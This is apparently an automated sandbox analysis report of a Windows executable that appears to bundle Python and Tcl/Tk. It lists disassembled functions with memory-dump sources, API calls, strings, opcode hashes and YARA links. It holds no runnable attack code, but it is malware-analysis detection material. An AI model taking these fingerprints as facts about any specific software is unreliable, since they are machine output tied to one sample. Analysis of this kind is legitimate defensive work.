                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                              • String ID:
                                                              • API String ID: 3714727158-0
                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                              • Instruction ID: 74309f112498c5ff5783d953913a435f8da0cccafa8c50719d8e3bbafe937668
                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                              • Instruction Fuzzy Hash: 63D1E322E0824286EF24EF26FC421B96351EF84798F44C076EA4DE7696DF3CE641C742
                                                              Function 00007FF623F8A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                              • Instruction ID: f891d0c350830a8d30cc694df7f49331d3098fcacfe173fcb2cbcaa5400768f5
                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                              • Instruction Fuzzy Hash: B2315E36608B8186EF608F25FC412AE73A4FB88794F544136EA9D97B98DF3CD645CB01
                                                              Function 00007FF623F91874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                              • Instruction ID: 87578543d64eeeedb5ecd9026ab2b65460e0b2c71fa6995c7aa6845f8956026e
                                                              • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                              • Instruction Fuzzy Hash: E1B1D822B1869241EF619F22BD021B96391EB44BE4F449171DE5EA7BD5DF3CEA42C302
                                                              Function 00007FF623F95E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EAA
                                                                • Part of subcall function 00007FF623F955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F9560C
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95EBB
                                                                • Part of subcall function 00007FF623F95598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955AC
                                                              • _get_daylight.LIBCMT ref: 00007FF623F95ECC
                                                                • Part of subcall function 00007FF623F955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F955DC
                                                                • Part of subcall function 00007FF623F8A948: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF623F9610C), ref: 00007FF623F95EF3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 1511944507-0
                                                              • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                              • Instruction ID: 2b82bd0ee96161ef44928f6b36998cfc2ca58fd522b00c19d32ac01e9802deef
                                                              • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                              • Instruction Fuzzy Hash: 2451C672A0864286EF10DF21FC835A96761FB88794F4481B6EA4DE76A6DF3CE6018741
                                                              Function 00007FFDFAEE1DD4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                              • API String ID: 3568877910-2178723975
                                                              • Opcode ID: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                              • Instruction ID: aba13aff18657b9f2b1db06020b266d0f282dc850fd352009d54fc50c725d08f
                                                              • Opcode Fuzzy Hash: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                              • Instruction Fuzzy Hash: 1612AF72B0868285E7289F25E464AAD77A0FF84B95F044275EEAD4B6CDDFBCD540CB00
                                                              Function 00007FFDFAEE1BE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: ..\s\ssl\statem\statem_srvr.c$resumption
                                                              • API String ID: 3568877910-332775882
                                                              • Opcode ID: d238de41f3b5908ff6e0d891771973e02df72eaa45c4e1ca10cf40615ca0378c
                                                              • Instruction ID: c337550b8c9152d97bc20946c3b2c3dec170a008c4caa9a49a82dccaf3dc1ad1
                                                              • Opcode Fuzzy Hash: d238de41f3b5908ff6e0d891771973e02df72eaa45c4e1ca10cf40615ca0378c
                                                              • Instruction Fuzzy Hash: D4B1C23270878186E754DB55D864BAE67A0EF84BA8F0405B5EE9D8B7D9CF3CD581C700
                                                              Function 00007FFDFAFA2B62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLastbind
                                                              • String ID: ..\s\crypto\bio\b_sock2.c
                                                              • API String ID: 2328862993-3200932406
                                                              • Opcode ID: f4eba0e76321d527428058d812512f7d5c496053af6b33bf15f3205fea0f7f21
                                                              • Instruction ID: ff14612bffd97b995d6f827c5cba727ba5085c26e243ff0bbc69c0811612ac49
                                                              • Opcode Fuzzy Hash: f4eba0e76321d527428058d812512f7d5c496053af6b33bf15f3205fea0f7f21
                                                              • Instruction Fuzzy Hash: 9321A432F1925286E710DB25E821AAD7760FB85798F404231EA6D4BBEDDF3DE545CB00
                                                              Function 00007FFDFAFA4246 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
                                                              • Instruction ID: 07b467a9396eaffddde87c66770572a89c91ef89aa9aaa5f47fe1147705a929e
                                                              • Opcode Fuzzy Hash: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
                                                              • Instruction Fuzzy Hash: 8CF0E9327683E145C7A5CA36A408F592DD59391BC8F16C030D90DC3F59E92EC5018B40
                                                              Function 00007FFDFAFA5731 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
                                                              • Instruction ID: 5d9ece96401363d0a5086b38a49b366e62cf2780759c2ab67c4de513014f9125
                                                              • Opcode Fuzzy Hash: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
                                                              • Instruction Fuzzy Hash: FAE0DF727193A506C7A6CA336118E692A90A716B89F43C030990EC3B99EC2EC601CB40
                                                              Function 00007FF623F75830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75840
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75852
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75889
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7589B
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758B4
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758C6
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758DF
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758F1
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7590D
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7591F
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7593B
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7594D
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75969
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7597B
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75997
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759A9
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759C5
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 199729137-653951865
                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                              • Instruction ID: 7d5c66c4d9a5669389682544d1bdcbb71416c5f2ce0bd87c29870c31cb4b213f
                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                              • Instruction Fuzzy Hash: 6322A364A0DB0BD2FE159F55BD175B422A1AF48B81F8590B5C41EAB270EF3CBB59C203
                                                              Function 00007FF623F776C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 199729137-3427451314
                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                              • Instruction ID: 97291d20f2de1d9dc0071117a78119b51c0e09e7b50eb4106f23570afe94c046
                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                              • Instruction Fuzzy Hash: 4E02C361A1DB0BD0FE149F19BD125B423A1AF48B45F6180B2D42EAB274EF3CB759C203
                                                              Function 00007FFDFB155600 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155651
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155668
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB15567F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1556B2
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1556FB
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB15572F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155781
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155794
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1557AB
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1557BE
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1557D5
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1557E8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1557FF
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155812
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155825
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155838
